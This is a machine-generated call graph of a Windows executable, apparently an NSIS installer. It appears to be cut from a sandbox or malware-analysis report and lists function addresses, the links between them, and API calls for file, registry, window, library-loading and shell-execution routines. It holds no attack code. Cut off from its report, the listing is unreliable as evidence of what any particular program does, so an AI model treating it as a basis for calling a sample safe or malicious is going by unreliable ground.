406bdd 3580->3582 3581->3571 3582->3581 3583 406c64 GlobalFree 3582->3583 3584 406c6d GlobalAlloc 3582->3584 3585 406ce4 GlobalAlloc 3582->3585 3586 406cdb GlobalFree 3582->3586 3583->3584 3584->3581 3584->3582 3585->3581 3585->3582 3586->3585 3588 404001 3587->3588 3609 4065af wsprintfW 3588->3609 3590 404072 3610 4040a6 3590->3610 3592 403da2 3592->3382 3593 404077 3593->3592 3594 4066a5 17 API calls 3593->3594 3594->3593 3595->3378 3613 4064d5 3596->3613 3599 403d73 3599->3377 3599->3379 3600 40656a RegQueryValueExW RegCloseKey 3600->3599 3601->3384 3617 404610 3602->3617 3604 4057e7 3605 404610 SendMessageW 3604->3605 3607 4057f9 OleUninitialize 3605->3607 3606 4057c0 3606->3604 3620 401389 3606->3620 3607->3414 3609->3590 3611 4066a5 17 API calls 3610->3611 3612 4040b4 SetWindowTextW 3611->3612 3612->3593 3614 4064e4 3613->3614 3615 4064e8 3614->3615 3616 4064ed RegOpenKeyExW 3614->3616 3615->3599 3615->3600 3616->3615 3618 404628 3617->3618 3619 404619 SendMessageW 3617->3619 3618->3606 3619->3618 3622 401390 3620->3622 3621 4013fe 3621->3606 3622->3621 3623 4013cb MulDiv SendMessageW 3622->3623 3623->3622 3624->3428 3626 405fff 3625->3626 3628 406011 3625->3628 3627 40600c CharNextW 3626->3627 3626->3628 3630 406035 3627->3630 3629 405f64 CharNextW 3628->3629 3628->3630 3629->3628 3630->3431 3630->3432 3632 4069b4 FindClose 3631->3632 3633 4069bf 3631->3633 3632->3633 3633->3438 3634->3459 3635->3459 3636->3457 3638 406304 GetShortPathNameW 3637->3638 3639 4062de 3637->3639 3640 406423 3638->3640 3641 406319 3638->3641 3664 406158 GetFileAttributesW CreateFileW 3639->3664 3640->3473 3641->3640 3643 406321 wsprintfA 3641->3643 3645 4066a5 17 API calls 3643->3645 3644 4062e8 CloseHandle GetShortPathNameW 3644->3640 3646 4062fc 3644->3646 3647 406349 3645->3647 3646->3638 3646->3640 3665 406158 GetFileAttributesW CreateFileW 3647->3665 3649 406356 3649->3640 3650 406365 GetFileSize GlobalAlloc 3649->3650 3651 406387 3650->3651 3652 40641c CloseHandle 3650->3652 3653 4061db ReadFile 3651->3653 3652->3640 3654 40638f 3653->3654 3654->3652 3666 4060bd lstrlenA 3654->3666 3657 4063a6 lstrcpyA 3660 4063c8 3657->3660 3658 4063ba 3659 4060bd 4 API calls 3658->3659 3659->3660 3661 4063ff SetFilePointer 3660->3661 3662 40620a WriteFile 3661->3662 3663 406415 GlobalFree 3662->3663 3663->3652 3664->3644 3665->3649 3667 4060fe lstrlenA 3666->3667 3668 406106 3667->3668 3669 4060d7 lstrcmpiA 3667->3669 3668->3657 3668->3658 3669->3668 3670 4060f5 CharNextA 3669->3670 3670->3667 3671 401941 3672 401943 3671->3672 3677 402da6 3672->3677 3678 402db2 3677->3678 3679 4066a5 17 API calls 3678->3679 3680 402dd3 3679->3680 3681 401948 3680->3681 3682 4068ef 5 API calls 3680->3682 3683 405d74 3681->3683 3682->3681 3684 40603f 18 API calls 3683->3684 3685 405d94 3684->3685 3686 405d9c DeleteFileW 3685->3686 3687 405db3 3685->3687 3691 401951 3686->3691 3688 405ed3 3687->3688 3719 406668 lstrcpynW 3687->3719 3688->3691 3695 40699e 2 API calls 3688->3695 3690 405dd9 3692 405dec 3690->3692 3693 405ddf lstrcatW 3690->3693 3694 405f83 2 API calls 3692->3694 3696 405df2 3693->3696 3694->3696 3698 405ef8 3695->3698 3697 405e02 lstrcatW 3696->3697 3699 405e0d lstrlenW FindFirstFileW 3696->3699 3697->3699 3698->3691 3700 405f37 3 API calls 3698->3700 3699->3688 3717 405e2f 3699->3717 3701 405f02 3700->3701 3703 405d2c 5 API calls 3701->3703 3702 405eb6 FindNextFileW 3706 405ecc FindClose 3702->3706 3702->3717 3705 405f0e 3703->3705 3707 405f12 3705->3707 3708 405f28 3705->3708 3706->3688 3707->3691 3711 4056ca 24 API calls 3707->3711 3710 4056ca 24 API calls 3708->3710 3710->3691 3713 405f1f 3711->3713 3712 405d74 60 API calls 3712->3717 3715 406428 36 API calls 3713->3715 3714 4056ca 24 API calls 3714->3702 3715->3691 3716 4056ca 24 API calls 3716->3717 3717->3702 3717->3712 3717->3714 3717->3716 3718 406428 36 API calls 3717->3718 3720 406668 lstrcpynW 3717->3720 3721 405d2c 3717->3721 3718->3717 3719->3690 3720->3717 3729 406133 GetFileAttributesW 3721->3729 3724 405d47 RemoveDirectoryW 3727 405d55 3724->3727 3725 405d4f DeleteFileW 3725->3727 3726 405d59 3726->3717 3727->3726 3728 405d65 SetFileAttributesW 3727->3728 3728->3726 3730 405d38 3729->3730 3731 406145 SetFileAttributesW 3729->3731 3730->3724 3730->3725 3730->3726 3731->3730 3732 4015c1 3733 402da6 17 API calls 3732->3733 3734 4015c8 3733->3734 3735 405fe2 4 API calls 3734->3735 3747 4015d1 3735->3747 3736 401631 3737 401663 3736->3737 3738 401636 3736->3738 3742 401423 24 API calls 3737->3742 3752 401423 3738->3752 3739 405f64 CharNextW 3739->3747 3749 40165b 3742->3749 3744 405c16 2 API calls 3744->3747 3745 405c33 5 API calls 3745->3747 3746 40164a SetCurrentDirectoryW 3746->3749 3747->3736 3747->3739 3747->3744 3747->3745 3748 4015fa 3747->3748 3750 401617 GetFileAttributesW 3747->3750 3748->3747 3751 405b99 4 API calls 3748->3751 3750->3747 3751->3748 3753 4056ca 24 API calls 3752->3753 3754 401431 3753->3754 3755 406668 lstrcpynW 3754->3755 3755->3746 3936 401c43 3958 402d84 3936->3958 3938 401c4a 3939 402d84 17 API calls 3938->3939 3940 401c57 3939->3940 3941 402da6 17 API calls 3940->3941 3942 401c6c 3940->3942 3941->3942 3943 401c7c 3942->3943 3944 402da6 17 API calls 3942->3944 3945 401cd3 3943->3945 3946 401c87 3943->3946 3944->3943 3948 402da6 17 API calls 3945->3948 3947 402d84 17 API calls 3946->3947 3950 401c8c 3947->3950 3949 401cd8 3948->3949 3951 402da6 17 API calls 3949->3951 3952 402d84 17 API calls 3950->3952 3953 401ce1 FindWindowExW 3951->3953 3954 401c98 3952->3954 3957 401d03 3953->3957 3955 401cc3 SendMessageW 3954->3955 3956 401ca5 SendMessageTimeoutW 3954->3956 3955->3957 3956->3957 3959 4066a5 17 API calls 3958->3959 3960 402d99 3959->3960 3960->3938 3968 4028c4 3969 4028ca 3968->3969 3970 4028d2 FindClose 3969->3970 3971 402c2a 3969->3971 3970->3971 3777 4040c5 3778 4040dd 3777->3778 3779 40423e 3777->3779 3778->3779 3780 4040e9 3778->3780 3781 40424f GetDlgItem GetDlgItem 3779->3781 3786 40428f 3779->3786 3783 4040f4 SetWindowPos 3780->3783 3784 404107 3780->3784 3853 4045c4 3781->3853 3782 4042e9 3787 404610 SendMessageW 3782->3787 3795 404239 3782->3795 3783->3784 3788 404110 ShowWindow 3784->3788 3789 404152 3784->3789 3786->3782 3794 401389 2 API calls 3786->3794 3818 4042fb 3787->3818 3796 404130 GetWindowLongW 3788->3796 3797 40422b 3788->3797 3791 404171 3789->3791 3792 40415a DestroyWindow 3789->3792 3790 404279 KiUserCallbackDispatcher 3793 40140b 2 API calls 3790->3793 3799 404176 SetWindowLongW 3791->3799 3800 404187 3791->3800 3798 40456e 3792->3798 3793->3786 3801 4042c1 3794->3801 3796->3797 3803 404149 ShowWindow 3796->3803 3859 40462b 3797->3859 3798->3795 3810 40457e ShowWindow 3798->3810 3799->3795 3800->3797 3804 404193 GetDlgItem 3800->3804 3801->3782 3805 4042c5 SendMessageW 3801->3805 3803->3789 3808 4041c1 3804->3808 3809 4041a4 SendMessageW IsWindowEnabled 3804->3809 3805->3795 3806 40140b 2 API calls 3806->3818 3807 40454f DestroyWindow EndDialog 3807->3798 3812 4041ce 3808->3812 3815 404215 SendMessageW 3808->3815 3816 4041e1 3808->3816 3824 4041c6 3808->3824 3809->3795 3809->3808 3810->3795 3811 4066a5 17 API calls 3811->3818 3812->3815 3812->3824 3814 4045c4 18 API calls 3814->3818 3815->3797 3819 4041e9 3816->3819 3820 4041fe 3816->3820 3817 4041fc 3817->3797 3818->3806 3818->3807 3818->3811 3818->3814 3825 4045c4 18 API calls 3818->3825 3822 40140b 2 API calls 3819->3822 3821 40140b 2 API calls 3820->3821 3823 404205 3821->3823 3822->3824 3823->3797 3823->3824 3856 40459d 3824->3856 3826 404376 GetDlgItem 3825->3826 3827 404393 ShowWindow EnableWindow 3826->3827 3828 40438b 3826->3828 3873 4045e6 EnableWindow 3827->3873 3828->3827 3830 4043bd EnableWindow 3835 4043d1 3830->3835 3831 4043d6 GetSystemMenu EnableMenuItem SendMessageW 3832 404406 SendMessageW 3831->3832 3831->3835 3832->3835 3834 4040a6 18 API calls 3834->3835 3835->3831 3835->3834 3874 4045f9 SendMessageW 3835->3874 3875 406668 lstrcpynW 3835->3875 3837 404435 lstrlenW 3838 4066a5 17 API calls 3837->3838 3839 40444b SetWindowTextW 3838->3839 3840 401389 2 API calls 3839->3840 3841 40445c 3840->3841 3841->3795 3841->3818 3842 40448f DestroyWindow 3841->3842 3844 40448a 3841->3844 3842->3798 3843 4044a9 CreateDialogParamW 3842->3843 3843->3798 3845 4044dc 3843->3845 3844->3795 3846 4045c4 18 API calls 3845->3846 3847 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3846->3847 3848 401389 2 API calls 3847->3848 3849 40452d 3848->3849 3849->3795 3850 404535 ShowWindow 3849->3850 3851 404610 SendMessageW 3850->3851 3852 40454d 3851->3852 3852->3798 3854 4066a5 17 API calls 3853->3854 3855 4045cf SetDlgItemTextW 3854->3855 3855->3790 3857 4045a4 3856->3857 3858 4045aa SendMessageW 3856->3858 3857->3858 3858->3817 3860 4046ee 3859->3860 3861 404643 GetWindowLongW 3859->3861 3860->3795 3861->3860 3862 404658 3861->3862 3862->3860 3863 404685 GetSysColor 3862->3863 3864 404688 3862->3864 3863->3864 3865 404698 SetBkMode 3864->3865 3866 40468e SetTextColor 3864->3866 3867 4046b0 GetSysColor 3865->3867 3868 4046b6 3865->3868 3866->3865 3867->3868 3869 4046c7 3868->3869 3870 4046bd SetBkColor 3868->3870 3869->3860 3871 4046e1 CreateBrushIndirect 3869->3871 3872 4046da DeleteObject 3869->3872 3870->3869 3871->3860 3872->3871 3873->3830 3874->3835 3875->3837 3975 4016cc 3976 402da6 17 API calls 3975->3976 3977 4016d2 GetFullPathNameW 3976->3977 3978 4016ec 3977->3978 3984 40170e 3977->3984 3980 40699e 2 API calls 3978->3980 3978->3984 3979 401723 GetShortPathNameW 3981 402c2a 3979->3981 3982 4016fe 3980->3982 3982->3984 3985 406668 lstrcpynW 3982->3985 3984->3979 3984->3981 3985->3984 3986 401e4e GetDC 3987 402d84 17 API calls 3986->3987 3988 401e60 GetDeviceCaps MulDiv ReleaseDC 3987->3988 3989 402d84 17 API calls 3988->3989 3990 401e91 3989->3990 3991 4066a5 17 API calls 3990->3991 3992 401ece CreateFontIndirectW 3991->3992 3993 402638 3992->3993 3993->3993 3994 402950 3995 402da6 17 API calls 3994->3995 3997 40295c 3995->3997 3996 402972 3999 406133 2 API calls 3996->3999 3997->3996 3998 402da6 17 API calls 3997->3998 3998->3996 4000 402978 3999->4000 4022 406158 GetFileAttributesW CreateFileW 4000->4022 4002 402985 4003 402a3b 4002->4003 4004 4029a0 GlobalAlloc 4002->4004 4005 402a23 4002->4005 4006 402a42 DeleteFileW 4003->4006 4007 402a55 4003->4007 4004->4005 4008 4029b9 4004->4008 4009 403371 44 API calls 4005->4009 4006->4007 4023 4035f8 SetFilePointer 4008->4023 4011 402a30 CloseHandle 4009->4011 4011->4003 4012 4029bf 4013 4035e2 ReadFile 4012->4013 4014 4029c8 GlobalAlloc 4013->4014 4015 4029d8 4014->4015 4016 402a0c 4014->4016 4017 403371 44 API calls 4015->4017 4018 40620a WriteFile 4016->4018 4021 4029e5 4017->4021 4019 402a18 GlobalFree 4018->4019 4019->4005 4020 402a03 GlobalFree 4020->4016 4021->4020 4022->4002 4023->4012 4031 403cd5 4032 403ce0 4031->4032 4033 403ce4 4032->4033 4034 403ce7 GlobalAlloc 4032->4034 4034->4033 4035 401956 4036 402da6 17 API calls 4035->4036 4037 40195d lstrlenW 4036->4037 4038 402638 4037->4038 4039 4014d7 4040 402d84 17 API calls 4039->4040 4041 4014dd Sleep 4040->4041 4043 402c2a 4041->4043 4044 4020d8 4045 4020ea 4044->4045 4055 40219c 4044->4055 4046 402da6 17 API calls 4045->4046 4047 4020f1 4046->4047 4049 402da6 17 API calls 4047->4049 4048 401423 24 API calls 4051 4022f6 4048->4051 4050 4020fa 4049->4050 4052 402110 LoadLibraryExW 4050->4052 4053 402102 GetModuleHandleW 4050->4053 4054 402121 4052->4054 4052->4055 4053->4052 4053->4054 4064 406aa4 4054->4064 4055->4048 4058 402132 4061 401423 24 API calls 4058->4061 4062 402142 4058->4062 4059 40216b 4060 4056ca 24 API calls 4059->4060 4060->4062 4061->4062 4062->4051 4063 40218e FreeLibrary 4062->4063 4063->4051 4069 40668a WideCharToMultiByte 4064->4069 4066 406ac1 4067 406ac8 GetProcAddress 4066->4067 4068 40212c 4066->4068 4067->4068 4068->4058 4068->4059 4069->4066 4070 402b59 4071 402b60 4070->4071 4072 402bab 4070->4072 4074 402ba9 4071->4074 4076 402d84 17 API calls 4071->4076 4073 406a35 5 API calls 4072->4073 4075 402bb2 4073->4075 4077 402da6 17 API calls 4075->4077 4078 402b6e 4076->4078 4079 402bbb 4077->4079 4080 402d84 17 API calls 4078->4080 4079->4074 4081 402bbf IIDFromString 4079->4081 4083 402b7a 4080->4083 4081->4074 4082 402bce 4081->4082 4082->4074 4088 406668 lstrcpynW 4082->4088 4087 4065af wsprintfW 4083->4087 4086 402beb CoTaskMemFree 4086->4074 4087->4074 4088->4086 4089 402a5b 4090 402d84 17 API calls 4089->4090 4091 402a61 4090->4091 4092 402aa4 4091->4092 4093 402a88 4091->4093 4098 40292e 4091->4098 4095 402abe 4092->4095 4096 402aae 4092->4096 4094 402a8d 4093->4094 4102 402a9e 4093->4102 4103 406668 lstrcpynW 4094->4103 4097 4066a5 17 API calls 4095->4097 4099 402d84 17 API calls 4096->4099 4097->4102 4099->4102 4102->4098 4104 4065af wsprintfW 4102->4104 4103->4098 4104->4098 3889 40175c 3890 402da6 17 API calls 3889->3890 3891 401763 3890->3891 3892 406187 2 API calls 3891->3892 3893 40176a 3892->3893 3894 406187 2 API calls 3893->3894 3894->3893 4105 401d5d 4106 402d84 17 API calls 4105->4106 4107 401d6e SetWindowLongW 4106->4107 4108 402c2a 4107->4108 4109 4028de 4110 4028e6 4109->4110 4111 4028ea FindNextFileW 4110->4111 4113 4028fc 4110->4113 4112 402943 4111->4112 4111->4113 4115 406668 lstrcpynW 4112->4115 4115->4113 4116 406d5f 4122 406be3 4116->4122 4117 40754e 4118 406c64 GlobalFree 4119 406c6d GlobalAlloc 4118->4119 4119->4117 4119->4122 4120 406ce4 GlobalAlloc 4120->4117 4120->4122 4121 406cdb GlobalFree 4121->4120 4122->4117 4122->4118 4122->4119 4122->4120 4122->4121 4123 401563 4124 402ba4 4123->4124 4127 4065af wsprintfW 4124->4127 4126 402ba9 4127->4126 4128 401968 4129 402d84 17 API calls 4128->4129 4130 40196f 4129->4130 4131 402d84 17 API calls 4130->4131 4132 40197c 4131->4132 4133 402da6 17 API calls 4132->4133 4134 401993 lstrlenW 4133->4134 4136 4019a4 4134->4136 4135 4019e5 4136->4135 4140 406668 lstrcpynW 4136->4140 4138 4019d5 4138->4135 4139 4019da lstrlenW 4138->4139 4139->4135 4140->4138 4148 40166a 4149 402da6 17 API calls 4148->4149 4150 401670 4149->4150 4151 40699e 2 API calls 4150->4151 4152 401676 4151->4152 4153 402aeb 4154 402d84 17 API calls 4153->4154 4155 402af1 4154->4155 4156 4066a5 17 API calls 4155->4156 4157 40292e 4155->4157 4156->4157 4158 4026ec 4159 402d84 17 API calls 4158->4159 4160 4026fb 4159->4160 4161 402745 ReadFile 4160->4161 4162 4061db ReadFile 4160->4162 4164 402785 MultiByteToWideChar 4160->4164 4165 40283a 4160->4165 4167 4027ab SetFilePointer MultiByteToWideChar 4160->4167 4168 40284b 4160->4168 4170 402838 4160->4170 4171 406239 SetFilePointer 4160->4171 4161->4160 4161->4170 4162->4160 4164->4160 4180 4065af wsprintfW 4165->4180 4167->4160 4169 40286c SetFilePointer 4168->4169 4168->4170 4169->4170 4172 406255 4171->4172 4175 40626d 4171->4175 4173 4061db ReadFile 4172->4173 4174 406261 4173->4174 4174->4175 4176 406276 SetFilePointer 4174->4176 4177 40629e SetFilePointer 4174->4177 4175->4160 4176->4177 4178 406281 4176->4178 4177->4175 4179 40620a WriteFile 4178->4179 4179->4175 4180->4170 4181 404a6e 4182 404aa4 4181->4182 4183 404a7e 4181->4183 4185 40462b 8 API calls 4182->4185 4184 4045c4 18 API calls 4183->4184 4186 404a8b SetDlgItemTextW 4184->4186 4187 404ab0 4185->4187 4186->4182 3895 40176f 3896 402da6 17 API calls 3895->3896 3897 401776 3896->3897 3898 401796 3897->3898 3899 40179e 3897->3899 3934 406668 lstrcpynW 3898->3934 3935 406668 lstrcpynW 3899->3935 3902 40179c 3906 4068ef 5 API calls 3902->3906 3903 4017a9 3904 405f37 3 API calls 3903->3904 3905 4017af lstrcatW 3904->3905 3905->3902 3926 4017bb 3906->3926 3907 40699e 2 API calls 3907->3926 3908 406133 2 API calls 3908->3926 3910 4017cd CompareFileTime 3910->3926 3911 40188d 3913 4056ca 24 API calls 3911->3913 3912 401864 3914 4056ca 24 API calls 3912->3914 3922 401879 3912->3922 3915 401897 3913->3915 3914->3922 3916 403371 44 API calls 3915->3916 3917 4018aa 3916->3917 3918 4018be SetFileTime 3917->3918 3919 4018d0 FindCloseChangeNotification 3917->3919 3918->3919 3921 4018e1 3919->3921 3919->3922 3920 4066a5 17 API calls 3920->3926 3924 4018e6 3921->3924 3925 4018f9 3921->3925 3923 406668 lstrcpynW 3923->3926 3927 4066a5 17 API calls 3924->3927 3928 4066a5 17 API calls 3925->3928 3926->3907 3926->3908 3926->3910 3926->3911 3926->3912 3926->3920 3926->3923 3929 405cc8 MessageBoxIndirectW 3926->3929 3933 406158 GetFileAttributesW CreateFileW 3926->3933 3930 4018ee lstrcatW 3927->3930 3931 401901 3928->3931 3929->3926 3930->3931 3932 405cc8 MessageBoxIndirectW 3931->3932 3932->3922 3933->3926 3934->3902 3935->3903 4188 401a72 4189 402d84 17 API calls 4188->4189 4190 401a7b 4189->4190 4191 402d84 17 API calls 4190->4191 4192 401a20 4191->4192 4193 401573 4194 401583 ShowWindow 4193->4194 4195 40158c 4193->4195 4194->4195 4196 402c2a 4195->4196 4197 40159a ShowWindow 4195->4197 4197->4196 4198 4023f4 4199 402da6 17 API calls 4198->4199 4200 402403 4199->4200 4201 402da6 17 API calls 4200->4201 4202 40240c 4201->4202 4203 402da6 17 API calls 4202->4203 4204 402416 GetPrivateProfileStringW 4203->4204 4205 4014f5 SetForegroundWindow 4206 402c2a 4205->4206 4207 401ff6 4208 402da6 17 API calls 4207->4208 4209 401ffd 4208->4209 4210 40699e 2 API calls 4209->4210 4211 402003 4210->4211 4213 402014 4211->4213 4214 4065af wsprintfW 4211->4214 4214->4213 4215 401b77 4216 402da6 17 API calls 4215->4216 4217 401b7e 4216->4217 4218 402d84 17 API calls 4217->4218 4219 401b87 wsprintfW 4218->4219 4220 402c2a 4219->4220 4221 4046fa lstrcpynW lstrlenW 4222 40167b 4223 402da6 17 API calls 4222->4223 4224 401682 4223->4224 4225 402da6 17 API calls 4224->4225 4226 40168b 4225->4226 4227 402da6 17 API calls 4226->4227 4228 401694 MoveFileW 4227->4228 4229 4016a0 4228->4229 4230 4016a7 4228->4230 4232 401423 24 API calls 4229->4232 4231 40699e 2 API calls 4230->4231 4234 4022f6 4230->4234 4233 4016b6 4231->4233 4232->4234 4233->4234 4235 406428 36 API calls 4233->4235 4235->4229 4243 4019ff 4244 402da6 17 API calls 4243->4244 4245 401a06 4244->4245 4246 402da6 17 API calls 4245->4246 4247 401a0f 4246->4247 4248 401a16 lstrcmpiW 4247->4248 4249 401a28 lstrcmpW 4247->4249 4250 401a1c 4248->4250 4249->4250 4251 4022ff 4252 402da6 17 API calls 4251->4252 4253 402305 4252->4253 4254 402da6 17 API calls 4253->4254 4255 40230e 4254->4255 4256 402da6 17 API calls 4255->4256 4257 402317 4256->4257 4258 40699e 2 API calls 4257->4258 4259 402320 4258->4259 4260 402331 lstrlenW lstrlenW 4259->4260 4261 402324 4259->4261 4263 4056ca 24 API calls 4260->4263 4262 4056ca 24 API calls 4261->4262 4265 40232c 4261->4265 4262->4265 4264 40236f SHFileOperationW 4263->4264 4264->4261 4264->4265 4266 401000 4267 401037 BeginPaint GetClientRect 4266->4267 4268 40100c DefWindowProcW 4266->4268 4270 4010f3 4267->4270 4271 401179 4268->4271 4272 401073 CreateBrushIndirect FillRect DeleteObject 4270->4272 4273 4010fc 4270->4273 4272->4270 4274 401102 CreateFontIndirectW 4273->4274 4275 401167 EndPaint 4273->4275 4274->4275 4276 401112 6 API calls 4274->4276 4275->4271 4276->4275 4277 401d81 4278 401d94 GetDlgItem 4277->4278 4279 401d87 4277->4279 4281 401d8e 4278->4281 4280 402d84 17 API calls 4279->4280 4280->4281 4282 401dd5 GetClientRect LoadImageW SendMessageW 4281->4282 4284 402da6 17 API calls 4281->4284 4285 401e33 4282->4285 4287 401e3f 4282->4287 4284->4282 4286 401e38 DeleteObject 4285->4286 4285->4287 4286->4287 4288 401503 4289 40150b 4288->4289 4291 40151e 4288->4291 4290 402d84 17 API calls 4289->4290 4290->4291 4292 404783 4293 40479b 4292->4293 4297 4048b5 4292->4297 4298 4045c4 18 API calls 4293->4298 4294 40491f 4295 4049e9 4294->4295 4296 404929 GetDlgItem 4294->4296 4303 40462b 8 API calls 4295->4303 4299 404943 4296->4299 4300 4049aa 4296->4300 4297->4294 4297->4295 4301 4048f0 GetDlgItem SendMessageW 4297->4301 4302 404802 4298->4302 4299->4300 4308 404969 SendMessageW LoadCursorW SetCursor 4299->4308 4300->4295 4304 4049bc 4300->4304 4325 4045e6 EnableWindow 4301->4325 4306 4045c4 18 API calls 4302->4306 4307 4049e4 4303->4307 4309 4049d2 4304->4309 4310 4049c2 SendMessageW 4304->4310 4312 40480f CheckDlgButton 4306->4312 4329 404a32 4308->4329 4309->4307 4315 4049d8 SendMessageW 4309->4315 4310->4309 4311 40491a 4326 404a0e 4311->4326 4323 4045e6 EnableWindow 4312->4323 4315->4307 4318 40482d GetDlgItem 4324 4045f9 SendMessageW 4318->4324 4320 404843 SendMessageW 4321 404860 GetSysColor 4320->4321 4322 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4320->4322 4321->4322 4322->4307 4323->4318 4324->4320 4325->4311 4327 404a21 SendMessageW 4326->4327 4328 404a1c 4326->4328 4327->4294 4328->4327 4332 405c8e ShellExecuteExW 4329->4332 4331 404998 LoadCursorW SetCursor 4331->4300 4332->4331 4333 402383 4334 40238a 4333->4334 4337 40239d 4333->4337 4335 4066a5 17 API calls 4334->4335 4336 402397 4335->4336 4338 405cc8 MessageBoxIndirectW 4336->4338 4338->4337 4339 402c05 SendMessageW 4340 402c2a 4339->4340 4341 402c1f InvalidateRect 4339->4341 4341->4340 4342 405809 4343 4059b3 4342->4343 4344 40582a GetDlgItem GetDlgItem GetDlgItem 4342->4344 4346 4059e4 4343->4346 4347 4059bc GetDlgItem CreateThread CloseHandle 4343->4347 4387 4045f9 SendMessageW 4344->4387 4349 405a0f 4346->4349 4350 405a34 4346->4350 4351 4059fb ShowWindow ShowWindow 4346->4351 4347->4346 4348 40589a 4353 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4348->4353 4352 405a6f 4349->4352 4355 405a23 4349->4355 4356 405a49 ShowWindow 4349->4356 4357 40462b 8 API calls 4350->4357 4389 4045f9 SendMessageW 4351->4389 4352->4350 4362 405a7d SendMessageW 4352->4362 4360 4058f3 SendMessageW SendMessageW 4353->4360 4361 40590f 4353->4361 4363 40459d SendMessageW 4355->4363 4358 405a69 4356->4358 4359 405a5b 4356->4359 4368 405a42 4357->4368 4365 40459d SendMessageW 4358->4365 4364 4056ca 24 API calls 4359->4364 4360->4361 4366 405922 4361->4366 4367 405914 SendMessageW 4361->4367 4362->4368 4369 405a96 CreatePopupMenu 4362->4369 4363->4350 4364->4358 4365->4352 4371 4045c4 18 API calls 4366->4371 4367->4366 4370 4066a5 17 API calls 4369->4370 4372 405aa6 AppendMenuW 4370->4372 4373 405932 4371->4373 4374 405ac3 GetWindowRect 4372->4374 4375 405ad6 TrackPopupMenu 4372->4375 4376 40593b ShowWindow 4373->4376 4377 40596f GetDlgItem SendMessageW 4373->4377 4374->4375 4375->4368 4379 405af1 4375->4379 4380 405951 ShowWindow 4376->4380 4381 40595e 4376->4381 4377->4368 4378 405996 SendMessageW SendMessageW 4377->4378 4378->4368 4382 405b0d SendMessageW 4379->4382 4380->4381 4388 4045f9 SendMessageW 4381->4388 4382->4382 4383 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4382->4383 4385 405b4f SendMessageW 4383->4385 4385->4385 4386 405b78 GlobalUnlock SetClipboardData CloseClipboard 4385->4386 4386->4368 4387->4348 4388->4377 4389->4349 4390 40248a 4391 402da6 17 API calls 4390->4391 4392 40249c 4391->4392 4393 402da6 17 API calls 4392->4393 4394 4024a6 4393->4394 4407 402e36 4394->4407 4397 40292e 4398 4024de 4400 4024ea 4398->4400 4403 402d84 17 API calls 4398->4403 4399 402da6 17 API calls 4402 4024d4 lstrlenW 4399->4402 4401 402509 RegSetValueExW 4400->4401 4404 403371 44 API calls 4400->4404 4405 40251f RegCloseKey 4401->4405 4402->4398 4403->4400 4404->4401 4405->4397 4408 402e51 4407->4408 4411 406503 4408->4411 4412 406512 4411->4412 4413 4024b6 4412->4413 4414 40651d RegCreateKeyExW 4412->4414 4413->4397 4413->4398 4413->4399 4414->4413 4415 404e0b 4416 404e37 4415->4416 4417 404e1b 4415->4417 4419 404e6a 4416->4419 4420 404e3d SHGetPathFromIDListW 4416->4420 4426 405cac GetDlgItemTextW 4417->4426 4421 404e54 SendMessageW 4420->4421 4422 404e4d 4420->4422 4421->4419 4424 40140b 2 API calls 4422->4424 4423 404e28 SendMessageW 4423->4416 4424->4421 4426->4423 4427 40290b 4428 402da6 17 API calls 4427->4428 4429 402912 FindFirstFileW 4428->4429 4430 40293a 4429->4430 4434 402925 4429->4434 4435 4065af wsprintfW 4430->4435 4432 402943 4436 406668 lstrcpynW 4432->4436 4435->4432 4436->4434 4437 40190c 4438 401943 4437->4438 4439 402da6 17 API calls 4438->4439 4440 401948 4439->4440 4441 405d74 67 API calls 4440->4441 4442 401951 4441->4442 4443 40190f 4444 402da6 17 API calls 4443->4444 4445 401916 4444->4445 4446 405cc8 MessageBoxIndirectW 4445->4446 4447 40191f 4446->4447 4448 401491 4449 4056ca 24 API calls 4448->4449 4450 401498 4449->4450 4451 402891 4452 402898 4451->4452 4453 402ba9 4451->4453 4454 402d84 17 API calls 4452->4454 4455 40289f 4454->4455 4456 4028ae SetFilePointer 4455->4456 4456->4453 4457 4028be 4456->4457 4459 4065af wsprintfW 4457->4459 4459->4453 4460 401f12 4461 402da6 17 API calls 4460->4461 4462 401f18 4461->4462 4463 402da6 17 API calls 4462->4463 4464 401f21 4463->4464 4465 402da6 17 API calls 4464->4465 4466 401f2a 4465->4466 4467 402da6 17 API calls 4466->4467 4468 401f33 4467->4468 4469 401423 24 API calls 4468->4469 4470 401f3a 4469->4470 4477 405c8e ShellExecuteExW 4470->4477 4472 401f82 4473 406ae0 5 API calls 4472->4473 4475 40292e 4472->4475 4474 401f9f CloseHandle 4473->4474 4474->4475 4477->4472 4478 402f93 4479 402fa5 SetTimer 4478->4479 4480 402fbe 4478->4480 4479->4480 4481 40300c 4480->4481 4482 403012 MulDiv 4480->4482 4483 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4482->4483 4483->4481 4499 401d17 4500 402d84 17 API calls 4499->4500 4501 401d1d IsWindow 4500->4501 4502 401a20 4501->4502 4503 401b9b 4504 401ba8 4503->4504 4505 401bec 4503->4505 4512 401bbf 4504->4512 4514 401c31 4504->4514 4506 401bf1 4505->4506 4507 401c16 GlobalAlloc 4505->4507 4511 40239d 4506->4511 4524 406668 lstrcpynW 4506->4524 4509 4066a5 17 API calls 4507->4509 4508 4066a5 17 API calls 4510 402397 4508->4510 4509->4514 4518 405cc8 MessageBoxIndirectW 4510->4518 4522 406668 lstrcpynW 4512->4522 4514->4508 4514->4511 4516 401c03 GlobalFree 4516->4511 4517 401bce 4523 406668 lstrcpynW 4517->4523 4518->4511 4520 401bdd 4525 406668 lstrcpynW 4520->4525 4522->4517 4523->4520 4524->4516 4525->4511 4526 40261c 4527 402da6 17 API calls 4526->4527 4528 402623 4527->4528 4531 406158 GetFileAttributesW CreateFileW 4528->4531 4530 40262f 4531->4530 4539 40149e 4540 4014ac PostQuitMessage 4539->4540 4541 40239d 4539->4541 4540->4541 4542 40259e 4552 402de6 4542->4552 4545 402d84 17 API calls 4546 4025b1 4545->4546 4547 4025d9 RegEnumValueW 4546->4547 4548 4025cd RegEnumKeyW 4546->4548 4550 40292e 4546->4550 4549 4025ee RegCloseKey 4547->4549 4548->4549 4549->4550 4553 402da6 17 API calls 4552->4553 4554 402dfd 4553->4554 4555 4064d5 RegOpenKeyExW 4554->4555 4556 4025a8 4555->4556 4556->4545 4557 4015a3 4558 402da6 17 API calls 4557->4558 4559 4015aa SetFileAttributesW 4558->4559 4560 4015bc 4559->4560 